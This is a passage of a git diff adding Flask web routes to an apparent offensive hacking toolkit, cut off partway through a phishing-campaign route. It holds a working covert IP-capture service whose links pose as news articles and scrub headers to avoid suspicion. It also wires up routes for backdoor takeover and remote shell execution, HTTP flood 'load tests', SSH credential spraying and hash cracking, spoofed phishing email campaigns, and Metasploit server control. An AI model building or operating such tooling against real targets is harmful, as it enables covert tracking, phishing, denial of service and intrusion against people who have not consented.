+@hack_hijack_bp.route('/hack-hijack/scan', methods=['POST']) +@login_required +def start_scan(): + data = request.get_json(silent=True) or {} + target = data.get('target', '').strip() + scan_type = data.get('scan_type', 'quick') + custom_ports = data.get('custom_ports', []) + + if not target: + return jsonify({'ok': False, 'error': 'Target IP required'}) + + # Validate scan type + if scan_type not in ('quick', 'full', 'nmap', 'custom'): + scan_type = 'quick' + + job_id = str(uuid.uuid4())[:8] + result_holder = {'result': None, 'error': None, 'done': False} + _running_scans[job_id] = result_holder + + def do_scan(): + try: + svc = _svc() + r = svc.scan_target( + target, + scan_type=scan_type, + custom_ports=custom_ports, + timeout=3.0, + ) + result_holder['result'] = r.to_dict() + except Exception as e: + result_holder['error'] = str(e) + finally: + result_holder['done'] = True + + threading.Thread(target=do_scan, daemon=True).start() + return jsonify({'ok': True, 'job_id': job_id, + 'message': f'Scan started on {target} ({scan_type})'}) + + +@hack_hijack_bp.route('/hack-hijack/scan/', methods=['GET']) +@login_required +def scan_status(job_id): + holder = _running_scans.get(job_id) + if not holder: + return jsonify({'ok': False, 'error': 'Job not found'}) + if not holder['done']: + return jsonify({'ok': True, 'done': False, 'message': 'Scan in progress...'}) + if holder['error']: + return jsonify({'ok': False, 'error': holder['error'], 'done': True}) + # Clean up + _running_scans.pop(job_id, None) + return jsonify({'ok': True, 'done': True, 'result': holder['result']}) + + +# ── Takeover ────────────────────────────────────────────────────────────────── + +@hack_hijack_bp.route('/hack-hijack/takeover', methods=['POST']) +@login_required +def attempt_takeover(): + data = request.get_json(silent=True) or {} + host = data.get('host', '').strip() + backdoor = data.get('backdoor', {}) + if not host or not backdoor: + return jsonify({'ok': False, 'error': 'Host and backdoor data required'}) + svc = _svc() + result = svc.attempt_takeover(host, backdoor) + return jsonify(result) + + +# ── Sessions ────────────────────────────────────────────────────────────────── + +@hack_hijack_bp.route('/hack-hijack/sessions', methods=['GET']) +@login_required +def list_sessions(): + svc = _svc() + return jsonify({'ok': True, 'sessions': svc.list_sessions()}) + + +@hack_hijack_bp.route('/hack-hijack/sessions//exec', methods=['POST']) +@login_required +def shell_exec(session_id): + data = request.get_json(silent=True) or {} + command = data.get('command', '') + if not command: + return jsonify({'ok': False, 'error': 'No command provided'}) + svc = _svc() + result = svc.shell_execute(session_id, command) + return jsonify(result) + + +@hack_hijack_bp.route('/hack-hijack/sessions/', methods=['DELETE']) +@login_required +def close_session(session_id): + svc = _svc() + return jsonify(svc.close_session(session_id)) + + +# ── History ─────────────────────────────────────────────────────────────────── + +@hack_hijack_bp.route('/hack-hijack/history', methods=['GET']) +@login_required +def scan_history(): + svc = _svc() + return jsonify({'ok': True, 'scans': svc.get_scan_history()}) + + +@hack_hijack_bp.route('/hack-hijack/history', methods=['DELETE']) +@login_required +def clear_history(): + svc = _svc() + return jsonify(svc.clear_history()) diff --git a/web/routes/ipcapture.py b/web/routes/ipcapture.py new file mode 100644 index 0000000..600e203 --- /dev/null +++ b/web/routes/ipcapture.py @@ -0,0 +1,172 @@ +"""IP Capture & Redirect — web routes for stealthy link tracking.""" + +from flask import (Blueprint, render_template, request, jsonify, + redirect, Response) +from web.auth import login_required + +ipcapture_bp = Blueprint('ipcapture', __name__) + + +def _svc(): + from modules.ipcapture import get_ip_capture + return get_ip_capture() + + +# ── Management UI ──────────────────────────────────────────────────────────── + +@ipcapture_bp.route('/ipcapture/') +@login_required +def index(): + return render_template('ipcapture.html') + + +@ipcapture_bp.route('/ipcapture/links', methods=['GET']) +@login_required +def list_links(): + svc = _svc() + links = svc.list_links() + for l in links: + l['stats'] = svc.get_stats(l['key']) + return jsonify({'ok': True, 'links': links}) + + +@ipcapture_bp.route('/ipcapture/links', methods=['POST']) +@login_required +def create_link(): + data = request.get_json(silent=True) or {} + target = data.get('target_url', '').strip() + if not target: + return jsonify({'ok': False, 'error': 'Target URL required'}) + if not target.startswith(('http://', 'https://')): + target = 'https://' + target + result = _svc().create_link( + target_url=target, + name=data.get('name', ''), + disguise=data.get('disguise', 'article'), + ) + return jsonify(result) + + +@ipcapture_bp.route('/ipcapture/links/', methods=['GET']) +@login_required +def get_link(key): + svc = _svc() + link = svc.get_link(key) + if not link: + return jsonify({'ok': False, 'error': 'Link not found'}) + link['stats'] = svc.get_stats(key) + return jsonify({'ok': True, 'link': link}) + + +@ipcapture_bp.route('/ipcapture/links/', methods=['DELETE']) +@login_required +def delete_link(key): + if _svc().delete_link(key): + return jsonify({'ok': True}) + return jsonify({'ok': False, 'error': 'Link not found'}) + + +@ipcapture_bp.route('/ipcapture/links//export') +@login_required +def export_captures(key): + fmt = request.args.get('format', 'json') + data = _svc().export_captures(key, fmt) + mime = 'text/csv' if fmt == 'csv' else 'application/json' + ext = 'csv' if fmt == 'csv' else 'json' + return Response(data, mimetype=mime, + headers={'Content-Disposition': f'attachment; filename=captures_{key}.{ext}'}) + + +# ── Capture Endpoints (NO AUTH — accessed by targets) ──────────────────────── + +@ipcapture_bp.route('/c/') +def capture_short(key): + """Short capture URL — /c/xxxxx""" + return _do_capture(key) + + +@ipcapture_bp.route('/article/') +def capture_article(subpath): + """Article-style capture URL — /article/2026/03/title-slug""" + svc = _svc() + full_path = '/article/' + subpath + link = svc.find_by_path(full_path) + if not link: + return Response('Not Found', status=404) + return _do_capture(link['key']) + + +@ipcapture_bp.route('/news/') +def capture_news(subpath): + """News-style capture URL.""" + svc = _svc() + full_path = '/news/' + subpath + link = svc.find_by_path(full_path) + if not link: + return Response('Not Found', status=404) + return _do_capture(link['key']) + + +@ipcapture_bp.route('/stories/') +def capture_stories(subpath): + """Stories-style capture URL.""" + svc = _svc() + full_path = '/stories/' + subpath + link = svc.find_by_path(full_path) + if not link: + return Response('Not Found', status=404) + return _do_capture(link['key']) + + +@ipcapture_bp.route('/p/') +def capture_page(subpath): + """Page-style capture URL.""" + svc = _svc() + full_path = '/p/' + subpath + link = svc.find_by_path(full_path) + if not link: + return Response('Not Found', status=404) + return _do_capture(link['key']) + + +@ipcapture_bp.route('/read/') +def capture_read(subpath): + """Read-style capture URL.""" + svc = _svc() + full_path = '/read/' + subpath + link = svc.find_by_path(full_path) + if not link: + return Response('Not Found', status=404) + return _do_capture(link['key']) + + +def _do_capture(key): + """Perform the actual IP capture and redirect.""" + svc = _svc() + link = svc.get_link(key) + if not link or not link.get('active'): + return Response('Not Found', status=404) + + # Get real client IP + ip = (request.headers.get('X-Forwarded-For', '').split(',')[0].strip() + or request.headers.get('X-Real-IP', '') + or request.remote_addr) + + # Record capture with all available metadata + svc.record_capture( + key=key, + ip=ip, + user_agent=request.headers.get('User-Agent', ''), + accept_language=request.headers.get('Accept-Language', ''), + referer=request.headers.get('Referer', ''), + headers=dict(request.headers), + ) + + # Fast 302 redirect — no page render, minimal latency + target = link['target_url'] + resp = redirect(target, code=302) + # Clean headers — no suspicious indicators + resp.headers.pop('X-Content-Type-Options', None) + resp.headers['Server'] = 'nginx' + resp.headers['Cache-Control'] = 'no-cache' + return resp diff --git a/web/routes/loadtest.py b/web/routes/loadtest.py new file mode 100644 index 0000000..4c6a2b9 --- /dev/null +++ b/web/routes/loadtest.py @@ -0,0 +1,144 @@ +"""Load testing web routes — start/stop/monitor load tests from the web UI.""" + +import json +import queue +from flask import Blueprint, render_template, request, jsonify, Response +from web.auth import login_required + +loadtest_bp = Blueprint('loadtest', __name__, url_prefix='/loadtest') + + +@loadtest_bp.route('/') +@login_required +def index(): + return render_template('loadtest.html') + + +@loadtest_bp.route('/start', methods=['POST']) +@login_required +def start(): + """Start a load test.""" + data = request.get_json(silent=True) or {} + target = data.get('target', '').strip() + if not target: + return jsonify({'ok': False, 'error': 'Target is required'}) + + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + + if tester.running: + return jsonify({'ok': False, 'error': 'A test is already running'}) + + config = { + 'target': target, + 'attack_type': data.get('attack_type', 'http_flood'), + 'workers': int(data.get('workers', 10)), + 'duration': int(data.get('duration', 30)), + 'requests_per_worker': int(data.get('requests_per_worker', 0)), + 'ramp_pattern': data.get('ramp_pattern', 'constant'), + 'ramp_duration': int(data.get('ramp_duration', 0)), + 'method': data.get('method', 'GET'), + 'headers': data.get('headers', {}), + 'body': data.get('body', ''), + 'timeout': int(data.get('timeout', 10)), + 'follow_redirects': data.get('follow_redirects', True), + 'verify_ssl': data.get('verify_ssl', False), + 'rotate_useragent': data.get('rotate_useragent', True), + 'custom_useragent': data.get('custom_useragent', ''), + 'rate_limit': int(data.get('rate_limit', 0)), + 'payload_size': int(data.get('payload_size', 1024)), + } + + tester.start(config) + return jsonify({'ok': True, 'message': 'Test started'}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@loadtest_bp.route('/stop', methods=['POST']) +@login_required +def stop(): + """Stop the running load test.""" + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + tester.stop() + return jsonify({'ok': True}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@loadtest_bp.route('/pause', methods=['POST']) +@login_required +def pause(): + """Pause the running load test.""" + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + tester.pause() + return jsonify({'ok': True}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@loadtest_bp.route('/resume', methods=['POST']) +@login_required +def resume(): + """Resume a paused load test.""" + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + tester.resume() + return jsonify({'ok': True}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@loadtest_bp.route('/status') +@login_required +def status(): + """Get current test status and metrics.""" + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + metrics = tester.metrics.to_dict() if tester.running else {} + return jsonify({ + 'running': tester.running, + 'paused': not tester._pause_event.is_set() if tester.running else False, + 'metrics': metrics, + }) + except Exception as e: + return jsonify({'running': False, 'error': str(e)}) + + +@loadtest_bp.route('/stream') +@login_required +def stream(): + """SSE stream for live metrics.""" + try: + from modules.loadtest import get_load_tester + tester = get_load_tester() + except Exception: + return Response("data: {}\n\n", mimetype='text/event-stream') + + sub = tester.subscribe() + + def generate(): + try: + while tester.running: + try: + data = sub.get(timeout=2) + yield f"data: {json.dumps(data)}\n\n" + except queue.Empty: + # Send keepalive + m = tester.metrics.to_dict() if tester.running else {} + yield f"data: {json.dumps({'type': 'metrics', 'data': m})}\n\n" + # Send final metrics + m = tester.metrics.to_dict() + yield f"data: {json.dumps({'type': 'done', 'data': m})}\n\n" + finally: + tester.unsubscribe(sub) + + return Response(generate(), mimetype='text/event-stream', + headers={'Cache-Control': 'no-cache', 'X-Accel-Buffering': 'no'}) diff --git a/web/routes/log_correlator.py b/web/routes/log_correlator.py new file mode 100644 index 0000000..adabcfd --- /dev/null +++ b/web/routes/log_correlator.py @@ -0,0 +1,82 @@ +"""Log Correlator routes.""" +from flask import Blueprint, request, jsonify, render_template +from web.routes.auth_routes import login_required + +log_correlator_bp = Blueprint('log_correlator', __name__, url_prefix='/logs') + +def _get_engine(): + from modules.log_correlator import get_log_correlator + return get_log_correlator() + +@log_correlator_bp.route('/') +@login_required +def index(): + return render_template('log_correlator.html') + +@log_correlator_bp.route('/ingest/file', methods=['POST']) +@login_required +def ingest_file(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().ingest_file(data.get('path', ''), data.get('source'))) + +@log_correlator_bp.route('/ingest/text', methods=['POST']) +@login_required +def ingest_text(): + data = request.get_json(silent=True) or {} + return jsonify(_get_engine().ingest_text(data.get('text', ''), data.get('source', 'paste'))) + +@log_correlator_bp.route('/search') +@login_required +def search(): + return jsonify(_get_engine().search_logs( + request.args.get('q', ''), request.args.get('source'), + int(request.args.get('limit', 100)) + )) + +@log_correlator_bp.route('/alerts', methods=['GET', 'DELETE']) +@login_required +def alerts(): + if request.method == 'DELETE': + _get_engine().clear_alerts() + return jsonify({'ok': True}) + return jsonify(_get_engine().get_alerts( + request.args.get('severity'), int(request.args.get('limit', 100)) + )) + +@log_correlator_bp.route('/rules', methods=['GET', 'POST', 'DELETE']) +@login_required +def rules(): + engine = _get_engine() + if request.method == 'POST': + data = request.get_json(silent=True) or {} + return jsonify(engine.add_rule( + rule_id=data.get('id', ''), name=data.get('name', ''), + pattern=data.get('pattern', ''), severity=data.get('severity', 'medium'), + threshold=data.get('threshold', 1), window_seconds=data.get('window_seconds', 0), + description=data.get('description', '') + )) + elif request.method == 'DELETE': + data = request.get_json(silent=True) or {} + return jsonify(engine.remove_rule(data.get('id', ''))) + return jsonify(engine.get_rules()) + +@log_correlator_bp.route('/stats') +@login_required +def stats(): + return jsonify(_get_engine().get_stats()) + +@log_correlator_bp.route('/sources') +@login_required +def sources(): + return jsonify(_get_engine().get_sources()) + +@log_correlator_bp.route('/timeline') +@login_required +def timeline(): + return jsonify(_get_engine().get_timeline(int(request.args.get('hours', 24)))) + +@log_correlator_bp.route('/clear', methods=['POST']) +@login_required +def clear(): + _get_engine().clear_logs() + return jsonify({'ok': True}) diff --git a/web/routes/malware_sandbox.py b/web/routes/malware_sandbox.py new file mode 100644 index 0000000..1c7ee52 --- /dev/null +++ b/web/routes/malware_sandbox.py @@ -0,0 +1,71 @@ +"""Malware Sandbox routes.""" +import os +from flask import Blueprint, request, jsonify, render_template, current_app +from web.routes.auth_routes import login_required + +malware_sandbox_bp = Blueprint('malware_sandbox', __name__, url_prefix='/sandbox') + +def _get_sandbox(): + from modules.malware_sandbox import get_sandbox + return get_sandbox() + +@malware_sandbox_bp.route('/') +@login_required +def index(): + return render_template('malware_sandbox.html') + +@malware_sandbox_bp.route('/status') +@login_required +def status(): + return jsonify(_get_sandbox().get_status()) + +@malware_sandbox_bp.route('/submit', methods=['POST']) +@login_required +def submit(): + sb = _get_sandbox() + if request.content_type and 'multipart' in request.content_type: + f = request.files.get('sample') + if not f: + return jsonify({'ok': False, 'error': 'No file uploaded'}) + upload_dir = current_app.config.get('UPLOAD_FOLDER', '/tmp') + filepath = os.path.join(upload_dir, f.filename) + f.save(filepath) + return jsonify(sb.submit_sample(filepath, f.filename)) + else: + data = request.get_json(silent=True) or {} + return jsonify(sb.submit_sample(data.get('path', ''), data.get('name'))) + +@malware_sandbox_bp.route('/samples') +@login_required +def samples(): + return jsonify(_get_sandbox().list_samples()) + +@malware_sandbox_bp.route('/static', methods=['POST']) +@login_required +def static_analysis(): + data = request.get_json(silent=True) or {} + return jsonify(_get_sandbox().static_analysis(data.get('path', ''))) + +@malware_sandbox_bp.route('/dynamic', methods=['POST']) +@login_required +def dynamic_analysis(): + data = request.get_json(silent=True) or {} + job_id = _get_sandbox().dynamic_analysis(data.get('path', ''), data.get('timeout', 60)) + return jsonify({'ok': bool(job_id), 'job_id': job_id}) + +@malware_sandbox_bp.route('/report', methods=['POST']) +@login_required +def generate_report(): + data = request.get_json(silent=True) or {} + return jsonify(_get_sandbox().generate_report(data.get('path', ''))) + +@malware_sandbox_bp.route('/reports') +@login_required +def reports(): + return jsonify(_get_sandbox().list_reports()) + +@malware_sandbox_bp.route('/job/') +@login_required +def job_status(job_id): + job = _get_sandbox().get_job(job_id) + return jsonify(job or {'error': 'Job not found'}) diff --git a/web/routes/net_mapper.py b/web/routes/net_mapper.py new file mode 100644 index 0000000..1667065 --- /dev/null +++ b/web/routes/net_mapper.py @@ -0,0 +1,85 @@ +"""Network Topology Mapper — web routes.""" + +from flask import Blueprint, render_template, request, jsonify +from web.auth import login_required + +net_mapper_bp = Blueprint('net_mapper', __name__) + + +def _svc(): + from modules.net_mapper import get_net_mapper + return get_net_mapper() + + +@net_mapper_bp.route('/net-mapper/') +@login_required +def index(): + return render_template('net_mapper.html') + + +@net_mapper_bp.route('/net-mapper/discover', methods=['POST']) +@login_required +def discover(): + data = request.get_json(silent=True) or {} + target = data.get('target', '').strip() + if not target: + return jsonify({'ok': False, 'error': 'Target required'}) + return jsonify(_svc().discover_hosts(target, method=data.get('method', 'auto'))) + + +@net_mapper_bp.route('/net-mapper/discover/', methods=['GET']) +@login_required +def discover_status(job_id): + return jsonify(_svc().get_job_status(job_id)) + + +@net_mapper_bp.route('/net-mapper/scan-host', methods=['POST']) +@login_required +def scan_host(): + data = request.get_json(silent=True) or {} + ip = data.get('ip', '').strip() + if not ip: + return jsonify({'ok': False, 'error': 'IP required'}) + return jsonify(_svc().scan_host(ip, + port_range=data.get('port_range', '1-1024'), + service_detection=data.get('service_detection', True), + os_detection=data.get('os_detection', True))) + + +@net_mapper_bp.route('/net-mapper/topology', methods=['POST']) +@login_required +def build_topology(): + data = request.get_json(silent=True) or {} + hosts = data.get('hosts', []) + return jsonify({'ok': True, **_svc().build_topology(hosts)}) + + +@net_mapper_bp.route('/net-mapper/scans', methods=['GET']) +@login_required +def list_scans(): + return jsonify({'ok': True, 'scans': _svc().list_scans()}) + + +@net_mapper_bp.route('/net-mapper/scans', methods=['POST']) +@login_required +def save_scan(): + data = request.get_json(silent=True) or {} + name = data.get('name', 'unnamed') + hosts = data.get('hosts', []) + return jsonify(_svc().save_scan(name, hosts)) + + +@net_mapper_bp.route('/net-mapper/scans/', methods=['GET']) +@login_required +def load_scan(filename): + data = _svc().load_scan(filename) + if data: + return jsonify({'ok': True, 'scan': data}) + return jsonify({'ok': False, 'error': 'Scan not found'}) + + +@net_mapper_bp.route('/net-mapper/diff', methods=['POST']) +@login_required +def diff_scans(): + data = request.get_json(silent=True) or {} + return jsonify(_svc().diff_scans(data.get('scan1', ''), data.get('scan2', ''))) diff --git a/web/routes/offense.py b/web/routes/offense.py index 022856b..5c5f85a 100644 --- a/web/routes/offense.py +++ b/web/routes/offense.py @@ -1,4 +1,4 @@ -"""Offense category route - MSF status, module search, sessions, module browsing, module execution.""" +"""Offense category route - MSF server control, module search, sessions, browsing, execution.""" import json import threading @@ -24,24 +24,190 @@ def index(): @offense_bp.route('/status') @login_required def status(): - """Get MSF connection status.""" + """Get MSF connection and server status.""" try: from core.msf_interface import get_msf_interface + from core.msf import get_msf_manager msf = get_msf_interface() + mgr = get_msf_manager() connected = msf.is_connected + settings = mgr.get_settings() - result = {'connected': connected} + # Check if server process is running + server_running, server_pid = mgr.detect_server() + + result = { + 'connected': connected, + 'server_running': server_running, + 'server_pid': server_pid, + 'host': settings.get('host', '127.0.0.1'), + 'port': settings.get('port', 55553), + 'username': settings.get('username', 'msf'), + 'ssl': settings.get('ssl', True), + 'has_password': bool(settings.get('password', '')), + } if connected: try: - settings = msf.manager.get_settings() - result['host'] = settings.get('host', 'localhost') - result['port'] = settings.get('port', 55553) + version = msf.manager.rpc.get_version() + result['version'] = version.get('version', '') except Exception: pass return jsonify(result) - except Exception: - return jsonify({'connected': False}) + except Exception as e: + return jsonify({'connected': False, 'server_running': False, 'error': str(e)}) + + +@offense_bp.route('/connect', methods=['POST']) +@login_required +def connect(): + """Connect to MSF RPC server.""" + data = request.get_json(silent=True) or {} + password = data.get('password', '').strip() + + try: + from core.msf import get_msf_manager + mgr = get_msf_manager() + settings = mgr.get_settings() + + # Use provided password or saved one + pwd = password or settings.get('password', '') + if not pwd: + return jsonify({'ok': False, 'error': 'Password required'}) + + mgr.connect(pwd) + version = mgr.rpc.get_version() if mgr.rpc else {} + return jsonify({ + 'ok': True, + 'version': version.get('version', 'Connected') + }) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@offense_bp.route('/disconnect', methods=['POST']) +@login_required +def disconnect(): + """Disconnect from MSF RPC server.""" + try: + from core.msf import get_msf_manager + mgr = get_msf_manager() + mgr.disconnect() + return jsonify({'ok': True}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@offense_bp.route('/server/start', methods=['POST']) +@login_required +def start_server(): + """Start the MSF RPC server.""" + data = request.get_json(silent=True) or {} + + try: + from core.msf import get_msf_manager + mgr = get_msf_manager() + settings = mgr.get_settings() + + username = data.get('username', '').strip() or settings.get('username', 'msf') + password = data.get('password', '').strip() or settings.get('password', '') + host = data.get('host', '').strip() or settings.get('host', '127.0.0.1') + port = int(data.get('port', 0) or settings.get('port', 55553)) + use_ssl = data.get('ssl', settings.get('ssl', True)) + + if not password: + return jsonify({'ok': False, 'error': 'Password required to start server'}) + + # Save settings + mgr.save_settings(host, port, username, password, use_ssl) + + # Kill existing server if running + is_running, _ = mgr.detect_server() + if is_running: + mgr.kill_server(use_sudo=False) + + # Start server (no sudo on web — would hang waiting for password) + import sys + use_sudo = sys.platform != 'win32' and data.get('sudo', False) + ok = mgr.start_server(username, password, host, port, use_ssl, use_sudo=use_sudo) + + if ok: + # Auto-connect after starting + try: + mgr.connect(password) + version = mgr.rpc.get_version() if mgr.rpc else {} + return jsonify({ + 'ok': True, + 'message': 'Server started and connected', + 'version': version.get('version', '') + }) + except Exception: + return jsonify({'ok': True, 'message': 'Server started (connect manually)'}) + else: + return jsonify({'ok': False, 'error': 'Failed to start server'}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@offense_bp.route('/server/stop', methods=['POST']) +@login_required +def stop_server(): + """Stop the MSF RPC server.""" + try: + from core.msf import get_msf_manager + mgr = get_msf_manager() + ok = mgr.kill_server(use_sudo=False) + return jsonify({'ok': ok}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@offense_bp.route('/settings', methods=['POST']) +@login_required +def save_settings(): + """Save MSF connection settings.""" + data = request.get_json(silent=True) or {} + try: + from core.msf import get_msf_manager + mgr = get_msf_manager() + mgr.save_settings( + host=data.get('host', '127.0.0.1'), + port=int(data.get('port', 55553)), + username=data.get('username', 'msf'), + password=data.get('password', ''), + use_ssl=data.get('ssl', True), + ) + return jsonify({'ok': True}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) + + +@offense_bp.route('/jobs') +@login_required +def list_jobs(): + """List running MSF jobs.""" + try: + from core.msf_interface import get_msf_interface + msf = get_msf_interface() + if not msf.is_connected: + return jsonify({'jobs': {}, 'error': 'Not connected to MSF'}) + jobs = msf.list_jobs() + return jsonify({'jobs': jobs}) + except Exception as e: + return jsonify({'jobs': {}, 'error': str(e)}) + + +@offense_bp.route('/jobs//stop', methods=['POST']) +@login_required +def stop_job(job_id): + """Stop a running MSF job.""" + try: + from core.msf_interface import get_msf_interface + msf = get_msf_interface() + ok = msf.stop_job(job_id) + return jsonify({'ok': ok}) + except Exception as e: + return jsonify({'ok': False, 'error': str(e)}) @offense_bp.route('/search', methods=['POST']) diff --git a/web/routes/password_toolkit.py b/web/routes/password_toolkit.py new file mode 100644 index 0000000..476b551 --- /dev/null +++ b/web/routes/password_toolkit.py @@ -0,0 +1,144 @@ +"""Password Toolkit — web routes for hash cracking, generation, and auditing.""" + +from flask import Blueprint, render_template, request, jsonify +from web.auth import login_required + +password_toolkit_bp = Blueprint('password_toolkit', __name__) + + +def _svc(): + from modules.password_toolkit import get_password_toolkit + return get_password_toolkit() + + +@password_toolkit_bp.route('/password-toolkit/') +@login_required +def index(): + return render_template('password_toolkit.html') + + +@password_toolkit_bp.route('/password-toolkit/identify', methods=['POST']) +@login_required +def identify_hash(): + data = request.get_json(silent=True) or {} + hashes = data.get('hashes', []) + single = data.get('hash', '').strip() + if single: + hashes = [single] + if not hashes: + return jsonify({'ok': False, 'error': 'No hash provided'}) + svc = _svc() + if len(hashes) == 1: + return jsonify({'ok': True, 'types': svc.identify_hash(hashes[0])}) + return jsonify({'ok': True, 'results': svc.identify_batch(hashes)}) + + +@password_toolkit_bp.route('/password-toolkit/crack', methods=['POST']) +@login_required +def crack_hash(): + data = request.get_json(silent=True) or {} + hash_str = data.get('hash', '').strip() + if not hash_str: + return jsonify({'ok': False, 'error': 'No hash provided'}) + svc = _svc() + result = svc.crack_hash( + hash_str=hash_str, + hash_type=data.get('hash_type', 'auto'), + wordlist=data.get('wordlist', ''), + attack_mode=data.get('attack_mode', 'dictionary'), + rules=data.get('rules', ''), + mask=data.get('mask', ''), + tool=data.get('tool', 'auto'), + ) + return jsonify(result) + + +@password_toolkit_bp.route('/password-toolkit/crack/', methods=['GET']) +@login_required +def crack_status(job_id): + return jsonify(_svc().get_crack_status(job_id)) + + +@password_toolkit_bp.route('/password-toolkit/generate', methods=['POST']) +@login_required +def generate(): + data = request.get_json(silent=True) or {} + svc = _svc() + passwords = svc.generate_password( + length=data.get('length', 16), + count=data.get('count', 5), + uppercase=data.get('uppercase', True), + lowercase=data.get('lowercase', True), + digits=data.get('digits', True), + symbols=data.get('symbols', True), + exclude_chars=data.get('exclude_chars', ''), + pattern=data.get('pattern', ''), + ) + audits = [svc.audit_password(pw) for pw in passwords] + return jsonify({'ok': True, 'passwords': [ + {'password': pw, **audit} for pw, audit in zip(passwords, audits) + ]}) + + +@password_toolkit_bp.route('/password-toolkit/audit', methods=['POST']) +@login_required +def audit(): + data = request.get_json(silent=True) or {} + pw = data.get('password', '') + if not pw: + return jsonify({'ok': False, 'error': 'No password provided'}) + return jsonify({'ok': True, **_svc().audit_password(pw)}) + + +@password_toolkit_bp.route('/password-toolkit/hash', methods=['POST']) +@login_required +def hash_string(): + data = request.get_json(silent=True) or {} + plaintext = data.get('plaintext', '') + algorithm = data.get('algorithm', 'sha256') + return jsonify(_svc().hash_string(plaintext, algorithm)) + + +@password_toolkit_bp.route('/password-toolkit/spray', methods=['POST']) +@login_required +def spray(): + data = request.get_json(silent=True) or {} + targets = data.get('targets', []) + passwords = data.get('passwords', []) + protocol = data.get('protocol', 'ssh') + delay = data.get('delay', 1.0) + return jsonify(_svc().credential_spray(targets, passwords, protocol, delay=delay)) + + +@password_toolkit_bp.route('/password-toolkit/spray/', methods=['GET']) +@login_required +def spray_status(job_id): + return jsonify(_svc().get_spray_status(job_id)) + + +@password_toolkit_bp.route('/password-toolkit/wordlists', methods=['GET']) +@login_required +def list_wordlists(): + return jsonify({'ok': True, 'wordlists': _svc().list_wordlists()}) + + +@password_toolkit_bp.route('/password-toolkit/wordlists', methods=['POST']) +@login_required +def upload_wordlist(): + f = request.files.get('file') + if not f or not f.filename: + return jsonify({'ok': False, 'error': 'No file uploaded'}) + data = f.read() + return jsonify(_svc().upload_wordlist(f.filename, data)) + + +@password_toolkit_bp.route('/password-toolkit/wordlists/', methods=['DELETE']) +@login_required +def delete_wordlist(name): + return jsonify(_svc().delete_wordlist(name)) + + +@password_toolkit_bp.route('/password-toolkit/tools', methods=['GET']) +@login_required +def tools_status(): + return jsonify({'ok': True, **_svc().get_tools_status()}) diff --git a/web/routes/phishmail.py b/web/routes/phishmail.py new file mode 100644 index 0000000..92bba4d --- /dev/null +++ b/web/routes/phishmail.py @@ -0,0 +1,516 @@ +"""Gone Fishing Mail Service — web routes.""" + +import json +import base64 +from flask import (Blueprint, render_template, request, jsonify, + Response, redirect, send_file) +from web.auth import login_required + +phishmail_bp = Blueprint('phishmail', __name__, url_prefix='/phishmail') + + +def _server(): + from modules.phishmail import get_gone_fishing + return get_gone_fishing() + + +# ── Page ───────────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/') +@login_required +def index(): + return render_template('phishmail.html') + + +# ── Send ───────────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/send', methods=['POST']) +@login_required +def send(): + """Send a single email.""" + data = request.get_json(silent=True) or {} + if not data.get('to_addrs'): + return jsonify({'ok': False, 'error': 'Recipients required'}) + if not data.get('from_addr'): + return jsonify({'ok': False, 'error': 'Sender address required'}) + + to_addrs = data.get('to_addrs', '') + if isinstance(to_addrs, str): + to_addrs = [a.strip() for a in to_addrs.split(',') if a.strip()] + + config = { + 'from_addr': data.get('from_addr', ''), + 'from_name': data.get('from_name', ''), + 'to_addrs': to_addrs, + 'subject': data.get('subject', ''), + 'html_body': data.get('html_body', ''), + 'text_body': data.get('text_body', ''), + 'smtp_host': data.get('smtp_host', '127.0.0.1'), + 'smtp_port': int(data.get('smtp_port', 25)), + 'use_tls': data.get('use_tls', False), + 'cert_cn': data.get('cert_cn', ''), + 'reply_to': data.get('reply_to', ''), + 'x_mailer': data.get('x_mailer', 'Microsoft Outlook 16.0'), + } + + result = _server().send_email(config) + return jsonify(result) + + +@phishmail_bp.route('/validate', methods=['POST']) +@login_required +def validate(): + """Validate that a recipient is on the local network.""" + data = request.get_json(silent=True) or {} + address = data.get('address', '') + if not address: + return jsonify({'ok': False, 'error': 'Address required'}) + + from modules.phishmail import _validate_local_only + ok, msg = _validate_local_only(address) + return jsonify({'ok': ok, 'message': msg}) + + +# ── Campaigns ──────────────────────────────────────────────────────────────── + +@phishmail_bp.route('/campaigns', methods=['GET']) +@login_required +def list_campaigns(): + server = _server() + campaigns = server.campaigns.list_campaigns() + for c in campaigns: + c['stats'] = server.campaigns.get_stats(c['id']) + return jsonify({'ok': True, 'campaigns': campaigns}) + + +@phishmail_bp.route('/campaigns', methods=['POST']) +@login_required +def create_campaign(): + data = request.get_json(silent=True) or {} + name = data.get('name', '').strip() + if not name: + return jsonify({'ok': False, 'error': 'Campaign name required'}) + + template = data.get('template', '') + targets = data.get('targets', []) + if isinstance(targets, str): + targets = [t.strip() for t in targets.split('\n') if t.strip()] + + cid = _server().campaigns.create_campaign( + name=name, + template=template, + targets=targets, + from_addr=data.get('from_addr', 'it@company.local'), + from_name=data.get('from_name', 'IT Department'), + subject=data.get('subject', ''), + smtp_host=data.get('smtp_host', '127.0.0.1'), + smtp_port=int(data.get('smtp_port', 25)), + ) + return jsonify({'ok': True, 'id': cid}) + + +@phishmail_bp.route('/campaigns/', methods=['GET']) +@login_required +def get_campaign(cid): + server = _server() + camp = server.campaigns.get_campaign(cid) + if not camp: + return jsonify({'ok': False, 'error': 'Campaign not found'}) + camp['stats'] = server.campaigns.get_stats(cid) + return jsonify({'ok': True, 'campaign': camp}) + + +@phishmail_bp.route('/campaigns//send', methods=['POST']) +@login_required +def send_campaign(cid): + data = request.get_json(silent=True) or {} + base_url = data.get('base_url', request.host_url.rstrip('/')) + result = 